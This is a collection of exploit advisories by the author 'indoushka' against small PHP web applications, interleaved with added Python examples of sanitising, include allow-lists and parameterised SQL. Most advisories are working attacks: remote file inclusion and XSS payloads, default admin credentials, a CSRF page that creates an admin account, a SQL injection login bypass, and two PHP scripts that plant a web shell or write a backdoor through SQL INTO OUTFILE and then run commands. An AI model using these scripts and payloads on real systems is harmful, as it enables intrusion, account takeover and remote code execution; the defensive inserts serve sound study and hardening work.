<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The page parameter of index.php accepts a remote URL (the same parameter is reported as a file inclusion below), so the script in the included page runs in the survey application's origin. The trailing %3f is an encoded '?', placed there so that any suffix the include appends ends up in the query string instead of the path.<br /><br />[+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />[+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Birth Certificate System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Default credentials : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/obcs/admin/dashboard.php<br /><br />[+] Check : log in with the pair above; if the dashboard loads, change the password or remove the account before the install is exposed.<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medical Card Generations System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Default credentials : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/mcgs/admin/dashboard.php<br /><br />[+] Check : log in with the pair above; if the dashboard loads, change the password or remove the account before the install is exposed.<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload stores HTML/JavaScript of your choice in the database through NicEdit (WYSIWYG editor, version 0.9 r25), which is loaded by /eahp/admin/about-us.php; the editor content is written to tblpage.PageDescription without any sanitisation.<br /> <br />[+] Line 2 : set the path of your database connection file. Use a local filesystem path: include() of an http:// URL only returns the rendered output of that script, not its $con variable.<br /><br />[+] Line 44 : the form data is sent with the fetch API (set your target URL here).<br /><br />[+] Save the payload as poc.php in your localhost path.<br /><br />[+] payload : <br /><br /><?php<br />include('C:/www/eahp/admin/includes/dbconnection.php'); // Line 2: local path of the target's database connection file (adjust to your environment)<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");<br /><br /> if ($query) {<br /> echo '<script>alert("About Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. 
Please try again.")</script>';<br /> }<br /> exit;<br />}<br />?><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushka | Update About Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> // Apply NicEdit to all text areas when the DOM is loaded<br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> // Function to handle form submission using JavaScript<br /> function submitForm(event) {<br /> event.preventDefault(); // Prevent default form submission<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content<br /><br /> // Prepare the form data to be sent<br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('submit', true);<br /><br /> // Send the form data using fetch API<br /> fetch('http://127.0.0.1/eahp/admin/about-us.php', {<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> alert('About Us content has been updated successfully.');<br /> console.log(data); // Handle the response from the server<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> /* Center the form container */<br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto; /* Center horizontally */<br /> padding: 20px;<br /> text-align: center; /* Center the content inside */<br /> }<br /><br /> /* Ensure the textarea takes the full width */<br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br 
/><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <!-- Page Title Section --><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Update the About Us Content</h1><br /> </div><br /> </div><br /> </section><br /> <!-- Form Section --><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <!-- Centering the form using a wrapper div --><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <!-- NicEdit will enhance this textarea --><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- End Form Section --><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- Footer --><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
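The advisory above shows the attacking side: editor HTML travels from NicEdit into tblpage.PageDescription untouched. The missing server-side step is an allow-list sanitiser applied before the UPDATE. The following is an added example written for this page, not code from the advisory or from the Emergency Ambulance Hiring Portal (which is PHP; this is Python so it can run stand-alone). The tag and attribute allow-lists are illustrative choices, not the application's.

```python
"""Allow-list sanitiser for WYSIWYG (NicEdit-style) HTML before storage.

Added example, not part of the advisory or of the vulnerable application.
Only the tags in ALLOWED_TAGS and the attributes in ALLOWED_ATTRS survive;
<script>/<style> blocks are dropped together with their text, event-handler
attributes are never copied, and href values with javascript:/data: schemes
are removed. Everything else is re-escaped as text.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "b", "i", "u", "strong", "em", "br", "ul", "ol", "li",
                "a", "h1", "h2", "h3"}          # illustrative allow-list
ALLOWED_ATTRS = {"a": {"href"}}                 # no style, no on* handlers
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" keeps relative links


def _safe_href(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other active scheme."""
    return urlparse(value.strip()).scheme.lower() in SAFE_SCHEMES


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped, its text content is kept
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # data arrives decoded (convert_charrefs=True), so re-escape it
            self.out.append(escape(data, quote=False))


def sanitize_editor_html(html: str) -> str:
    """Return the HTML with only allow-listed markup; safe to store."""
    parser = _Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # constructed sample of what the PoC above would submit in pagedes
    dirty = ('<p onclick="alert(1)">Hello <script>alert(document.cookie)'
             '</script><a href="javascript:alert(1)">x</a></p>')
    print(sanitize_editor_html(dirty))
```

In about-us.php the equivalent call would sit between reading $_POST['pagedes'] and the UPDATE; real_escape_string only protects the SQL statement, not the browser that later renders the stored HTML.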
<pre><code>=============================================================================================================================================<br />| # Title : Printable Staff ID Card Creator System 1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure direct object reference : upload.php can be reached directly with the organisation-setup form below, which allows users to upload and execute remote files (the "Attach Organisation Logo" field carries the file).<br /><br />[+] Line 8 : set your target (the form action).<br /><br />[+] Save as poc.html<br /><br />[+] payload :<br /><br /><br /><div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;"><br /> <div class="modal-header" style="background:#222d32"><br /> <button type="button" class="close" data-dismiss="modal">×</button><br /> <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center><br /> SYSTEM INFORMATION INITIALISATION<br /> </center></h4><br /> </div><br /> <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data"> <br /><br /> <div class="modal-body"> <br /> <center> <br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" 
name="orgphone"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p><br /> Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed"><br /> <input type="hidden" name="page" value="admin.php"> <br /> </center><br /> </div><br /> <div class="modal-footer"><br /> <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;<br /> <button type="button" class="btn btn-success" data-dismiss="modal">Close</button><br /> </div><br /> </form></div><br /> <br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Prison Management System v1.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This HTML page sends a hand-built multipart/form-data request to classes/Users.php?f=save that creates a new account (username indoushka, password Hacked, type 1). The request is sent with the browser's cookies (withCredentials), so the page also works as a CSRF page against a logged-in administrator.<br /><br />[+] Save the payload as poc.html <br /><br />[+] Line 6 : set your target.<br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/pms\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br 
/> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The page parameter of index.php is passed to an include without restriction, so a remote URL is fetched and executed (remote file inclusion). The %3F at the end is an encoded '?': any suffix the include appends becomes part of the query string and no longer changes the path that is fetched.<br /><br />[+] Use Payload : /survey/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />[+] http://127.0.0.1/survey/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
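Both Online Survey System advisories (the XSS one above and this file inclusion) drive the same page parameter. The following added example, which is not code from either advisory or from the application, walks through what the payloads do to a suffix-appending include and shows the allow-list resolver that closes the hole. Since index.php is not shown, the suffix (PAGE_SUFFIX) and the allow-list (ALLOWED_PAGES) are assumptions; the encoded '?' ending both payloads only makes sense against such a suffix.

```python
"""The page= payloads from the Online Survey System advisories, replayed
against a model of a suffix-appending include, next to a hardened resolver.

Added example, not code from the advisory or from the application.
Assumptions (hypothetical, the advisory does not show index.php):
  PAGE_SUFFIX   - the fixed suffix the vulnerable include appends
  ALLOWED_PAGES - the allow-list the hardened resolver uses instead
"""
from urllib.parse import unquote, urlsplit

PAGE_SUFFIX = ".php"                       # assumed appended suffix
ALLOWED_PAGES = {                          # hypothetical allow-list
    "home": "pages/home.php",
    "survey": "pages/survey.php",
}
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps")


def decode_query_value(raw: str) -> str:
    """One round of percent-decoding, as PHP applies to $_GET.
    %3f -> '?' and %2500 -> '%00' (double encoding survives one pass)."""
    return unquote(raw)


def vulnerable_include_target(page: str) -> str:
    """Models include($_GET['page'] . PAGE_SUFFIX) with no validation."""
    return page + PAGE_SUFFIX


def include_target_parts(target: str) -> dict:
    """How a URL wrapper would split the include target: because of the
    '?' in the payload, the appended suffix lands in the query string."""
    parts = urlsplit(target)
    return {"scheme": parts.scheme, "host": parts.netloc,
            "path": parts.path, "query": parts.query}


def is_remote_include(target: str) -> bool:
    """True when the include would fetch a remote resource (RFI)."""
    parts = urlsplit(target)
    return parts.scheme in REMOTE_SCHEMES and bool(parts.netloc)


def safe_include_target(page: str):
    """Hardened resolver: the parameter selects a key in an allow-list and
    is never used as a path or URL; anything unknown yields None."""
    return ALLOWED_PAGES.get(page)


if __name__ == "__main__":
    for raw in ("http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg",
                "http://some-inexistent-website.acu/"
                "some_inexistent_file_with_long_name%3F.jpg"):
        decoded = decode_query_value(raw)
        target = vulnerable_include_target(decoded)
        print(target)
        print("  remote:", is_remote_include(target),
              include_target_parts(target))
        print("  hardened resolver returns:", safe_include_target(decoded))
```

A practitioner checking a fix should also confirm allow_url_include is off in php.ini; the allow-list alone already stops traversal and remote URLs, but the ini setting removes the remote half of the problem for every include in the code base.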
<pre><code>=============================================================================================================================================<br />| # Title : Online Student Grading System 1.0 Authentication Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/projects/php/online-student-grading-system/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload (in both the username and the password field) : ' or 0=0 ##<br /><br />[+] The quote closes the string literal, 0=0 is always true and ## comments out the rest of the statement, so the WHERE clause matches the first account in the table.<br /><br />[+] http://127.0.0.1/Student_Grading_System/<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
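As an added example (not code from the advisory or from the Online Student Grading System, whose login query is not shown), the block below builds the login query the way a vulnerable PHP login typically does, prints the SQL that the ' or 0=0 ## payload produces, and runs the same logic against an in-memory SQLite table next to a parameterised query that treats the payload as plain data. SQLite has no MySQL-style # comment, so the executable variant substitutes -- for ## ; the concatenated string is otherwise identical. The users table and its single row are constructed for the demo.

```python
"""Why `' or 0=0 ##` in both login fields authenticates, and the fix.

Added example, not code from the advisory or from the application. The
query shape (string concatenation into WHERE) is the common pattern behind
this class of bypass; the table contents are constructed sample data.
"""
import sqlite3

PAYLOAD_MYSQL = "' or 0=0 ##"     # exactly what the advisory submits
PAYLOAD_SQLITE = "' or 0=0 -- "   # same payload with SQLite's comment token


def build_login_query(user: str, password: str) -> str:
    """The vulnerable concatenation, as in
    "... WHERE username='$user' AND password='$pass'" in PHP."""
    return (f"SELECT id, username FROM users WHERE username='{user}' "
            f"AND password='{password}'")


def _demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                "username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!')")
    return con


def login_vulnerable(user: str, password: str):
    """Executes the concatenated query; returns the matched username or None.
    With the payload the WHERE clause degenerates to username='' or 0=0 and
    the comment token swallows the password check."""
    con = _demo_db()
    row = con.execute(build_login_query(user, password)).fetchone()
    return row[1] if row else None


def login_safe(user: str, password: str):
    """Parameterised version: the payload is compared as a literal string."""
    con = _demo_db()
    row = con.execute(
        "SELECT id, username FROM users WHERE username=? AND password=?",
        (user, password)).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    print(build_login_query(PAYLOAD_MYSQL, PAYLOAD_MYSQL))
    print("vulnerable login ->", login_vulnerable(PAYLOAD_SQLITE, PAYLOAD_SQLITE))
    print("parameterised login ->", login_safe(PAYLOAD_SQLITE, PAYLOAD_SQLITE))
```

The fix is the parameterised statement, not escaping the quote: with prepared statements the quote, the tautology and the comment token are all just characters in a bound value.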
<pre><code>=============================================================================================================================================<br />| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This payload registers a user (or logs in with -m/-p), uploads a PHP web shell as the husband's image through user/marriage-reg-form.php, finds the renamed file and runs the command given with -c.<br /><br />[+] The target URL is passed with -u; no line needs editing.<br /><br />[+] Save the payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php poc.php -u http://127.0.0.1/omrs/ -c dir<br /><br />[+] payload :<br /><br /><?php<br />// Parse command line arguments: -u target URL, -c command, -m mobile number and -p password (both optional)<br />$options = getopt("u:c:m:p:");<br />$url = rtrim($options['u'] ?? '', '/');<br />$command = $options['c'] ?? null;<br />$mobile = $options['m'] ?? null;<br />$password = $options['p'] ?? null;<br /><br />if (!$url || !$command) {<br /> die("Usage: php poc.php -u <url> -c <command> [-m <mobile>] [-p <password>] \n");<br />}<br /><br />function login($url, $mobile, $password) {<br /> $loginUrl = "{$url}/user/login.php";<br /><br /> $ch = curl_init($loginUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br /> 'mobno' => $mobile,<br /> 'password' => $password,<br /> 'login' => ''<br /> ]));<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_HEADER, true);<br /> curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); // the session cookie is saved here and reused by upload()<br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> // Extract PHPSESSID from the Set-Cookie response header (cookie.txt is in Netscape format, not "name=value;")<br /> preg_match('/PHPSESSID=(\w+);/', $response, $matches);<br /> return $matches[1] ?? null;<br />}<br /><br />function upload($url, $cookie) {<br /> $uploadUrl = "{$url}/user/marriage-reg-form.php";<br /><br /> // curl_file_create() takes a file path, a MIME type and the file name sent to the server,<br /> // not the file contents: write the web shell to disk first<br /> file_put_contents('shell.php', '<?php $command = shell_exec($_REQUEST["cmd"]); echo $command; ?>');<br /> if (!file_exists('test.jpg')) {<br /> file_put_contents('test.jpg', "\xFF\xD8\xFF\xD9"); // smallest JPEG marker sequence, for the second image field<br /> }<br /> $fileData = [<br /> 'husimage' => curl_file_create('shell.php', 'application/x-php', 'shell.php'),<br /> 'wifeimage' => curl_file_create('test.jpg', 'image/jpeg', 'test.jpg')<br /> ];<br /><br /> $ch = curl_init($uploadUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);<br /> curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); // session established by login()<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] PHP shell uploaded\n";<br />}<br /><br />function getRemotePhpFiles($url) {<br /> // Uploaded files are expected to be renamed to a numeric name (\d{10,42}.php);<br /> // the listing is taken before and after the upload and the difference is the shell<br /> $filesUrl = "{$url}/";<br /> $ch = curl_init($filesUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> preg_match_all('/\d{10,42}\.php/', $response, $matches);<br /> return $matches[0];<br />}<br /><br />function execCommand($url, $webshell, $command) {<br /> $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command);<br /> $ch = curl_init($commandUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> $output = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] Command output\n" . $output . "\n";<br />}<br /><br />function register($mobile, $password, $url) {<br /> $signupUrl = "{$url}/user/signup.php";<br /><br /> $ch = curl_init($signupUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br /> 'fname' => 'indoushka',<br /> 'lname' => 'indoushka',<br /> 'mobno' => $mobile,<br /> 'address' => 'indoushka',<br /> 'password' => $password,<br /> 'submit' => ''<br /> ]));<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] Registered with mobile phone $mobile and password '$password'\n";<br />}<br /><br />if ($mobile === null || $password === null) {<br /> // No existing account supplied: create one with a random mobile number and a default password<br /> $mobile = $mobile ?? strval(rand(100000000, 999999999));<br /> $password = $password ?? 'inouvis-2022';<br /> register($mobile, $password, $url);<br />}<br /><br />$cookie = login($url, $mobile, $password);<br />$initialPhpFiles = getRemotePhpFiles($url);<br />upload($url, $cookie);<br />$finalPhpFiles = getRemotePhpFiles($url);<br />$newFiles = array_values(array_diff($finalPhpFiles, $initialPhpFiles)); // array_diff keeps the original keys, so re-index before [0]<br />if (!$newFiles) {<br /> die("[-] Uploaded shell not found in the listing\n");<br />}<br />execCommand($url, $newFiles[0], $command);<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Dairy Farm Shop Management System 1.2 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/12/Dairy-Farm-Shop-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This payload writes a PHP backdoor to disk through SQL injection in the login form: the username field is turned into a UNION SELECT ... INTO OUTFILE statement that creates uploaded.php in the web root.<br /><br />[+] Requirements : the MySQL account used by the application must hold the FILE privilege and secure_file_priv must allow writing to the destination directory. The script prints success unconditionally; the whoami request at the end is the real check.<br /><br />[+] Line 16 + 19 : set your target URL and the filesystem path of the target's web root.<br /><br />[+] Save the payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php poc.php<br /><br />[+] payload :<br /><br /><?php<br />// Helper: send a form-encoded POST request and return the response body<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Fixed target URL (Line 16)<br />$url = 'http://localhost/dfsms/';<br /><br />// Fixed path, on the target's filesystem, where MySQL writes the file (Line 19)<br />$path = 'C:\www\dfsms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path); // backslashes must be doubled inside the MySQL string literal<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send the PHP backdoor through the username field: UNION SELECT ... INTO OUTFILE<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request(rtrim($url, '/') . "/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n"; // printed regardless of outcome; the next request is the real test<br /><br />// Request the written PHP file and test the backdoor<br />$response = file_get_contents(rtrim($url, '/') . "/uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>